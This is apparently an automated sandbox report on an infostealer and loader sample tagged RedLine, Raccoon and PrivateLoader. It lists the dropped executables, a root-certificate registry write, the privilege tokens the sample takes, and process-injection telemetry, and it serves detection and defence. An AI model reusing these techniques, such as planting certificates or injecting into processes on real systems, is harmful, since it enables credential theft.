Malware Analysis Report

2024-11-13 19:46

Sample ID 220806-wsk1dsbhe2
Target 40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe
SHA256 40c4d06433a2db2e570b3302e01c5c2ebe51efb59473a5b08cb132ab6af8638b
Tags
privateloader raccoon redline 2f2ad1a1aa093c5a9d17040c8efd5650a99640b5 fucker2 media18 aspackv2 infostealer loader stealer onlylogger socelars chris discovery spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

40c4d06433a2db2e570b3302e01c5c2ebe51efb59473a5b08cb132ab6af8638b

Threat Level: Known bad

The file 40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe was found to be: Known bad.

Malicious Activity Summary

privateloader raccoon redline 2f2ad1a1aa093c5a9d17040c8efd5650a99640b5 fucker2 media18 aspackv2 infostealer loader stealer onlylogger socelars chris discovery spyware

Socelars payload

Process spawned unexpected child process

Socelars

OnlyLogger

PrivateLoader

RedLine

Raccoon

RedLine payload

OnlyLogger payload

Blocklisted process makes network request

Executes dropped EXE

ASPack v2.12-2.42

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Kills process with taskkill

Script User-Agent

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Modifies system certificate store

Suspicious use of UnmapMainImage

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-06 18:11

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-06 18:11

Reported

2022-08-06 18:13

Platform

win7-20220718-en

Max time kernel

37s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe"

Signatures

PrivateLoader

loader privateloader

Raccoon

stealer raccoon

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19c43a743a35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19053251dd9e13fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1922ecc1aaabd2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b6650547.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue196c8dc8316d5e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19ad8dd95e905.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b1a112f2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19862f0a4c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19581adec51f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1984208f692605cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue199b79a9228e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19de85da9de6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19896d3ece3b4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue199b79a9228e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19896d3ece3b4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19053251dd9e13fe.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19053251dd9e13fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19053251dd9e13fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue196c8dc8316d5e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue196c8dc8316d5e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1922ecc1aaabd2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1922ecc1aaabd2.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19ad8dd95e905.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19ad8dd95e905.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19862f0a4c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19862f0a4c.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1984208f692605cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1984208f692605cf.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19896d3ece3b4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19896d3ece3b4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19053251dd9e13fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19896d3ece3b4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19053251dd9e13fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19053251dd9e13fe.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up geolocation information via web service

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b2a645b19f70.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19de85da9de6.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19862f0a4c.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 892 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe
PID 892 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe
PID 892 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe
PID 892 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe
PID 892 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe
PID 892 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe
PID 892 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe
PID 1260 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 820 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 1920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 1920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 1920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 1920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 1920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 1920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 1920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1260 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1260 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\7zSC735351C\setup_install.exe C:\Windows\SysWOW64\cmd.exe
